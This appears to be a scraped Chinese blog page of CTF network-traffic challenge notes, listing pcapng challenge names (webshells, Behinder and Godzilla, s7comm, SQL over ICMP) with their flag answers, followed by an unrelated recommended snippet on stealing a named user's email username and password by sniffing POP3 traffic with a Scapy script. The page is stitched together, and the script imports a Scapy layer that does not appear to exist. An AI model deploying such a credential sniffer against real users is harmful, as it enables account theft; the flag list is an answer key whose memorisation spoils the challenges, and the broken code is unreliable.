风二西CTF流量题大集合-刷题笔记|其他题

flag123docx.pcapng

flag{de51f87f-0d63-433b-99e0-4a002345d908}

Baby_TCP

DASCTF{b4a7c67f-5236-4bce-bcbe-1a2359337d49}

sql_icmp_zip.pcapng

flag{2243eea3-db77-4796-b88c-c77844dbc0bd}

sql_icmp.pcapng

flag{b64e0716-64e5-42f53-8697-b4b23e53229d}

No11.pcapng

DASCTF{69a7c3f8eae457779f53be70a7e14a87}

webshell三巨头.pcapng

flag{14db06b9-c7eb-4bc1-8d86-6e115c61e57d}

冰蝎4.0和哥斯拉4.0.pcapng

flag{a3908520-7c03-42fd-8dd6-56e322493ef5}

s7comm.pcapng

flag{1b2c0163806149199f01431705cbe5fd}

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
首先,需要对Scapy有一定的了解。Scapy是一个Python库,用于数据包的操作和网络协议的分析。使用Scapy可以构造、发送、捕获和解码网络数据包,它支持众多的协议和数据包类型。在本中,我们需要使用Scapy来窃取example@test.com的用户名和密码。 1. 首先需要使用Wireshark等网络抓包工具来获取example@test.com的登录流量,可以使用POP3、SMTP或HTTP协议。 2. 使用Scapy来解析抓包获取的数据包,以POP3为例,我们需要使用TCP协议和POP3协议来获取用户名和密码。使用以下代码来解析数据包: ```python from scapy.all import * from scapy.layers.inet import TCP from scapy.layers.pop import POP def handle_packet(packet): if packet.haslayer(TCP) and packet.haslayer(POP): payload = packet.getlayer(TCP).payload if isinstance(payload, bytes): payload = payload.decode("utf-8", errors="ignore") if "USER" in payload: username = payload.split("USER ")[1].strip() print("Username:", username) elif "PASS" in payload: password = payload.split("PASS ")[1].strip() print("Password:", password) sniff(filter="tcp and port 110", prn=handle_packet) ``` 这段代码会监听TCP端口110(POP3)的流量,并且会解析其中的用户名和密码。如果数据包中包含USER命令,则提取出用户名;如果数据包中包含PASS命令,则提取出密码。 3. 运行代码,等待example@test.com登录邮箱,当example@test.com登录邮箱时,Scapy会监听到相应的数据包,并且会将其中的用户名和密码输出到控制台上。 需要注意的是,虽然这种方法可以窃取example@test.com的用户名和密码,但这种方法是非法的,仅供学习和研究使用,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值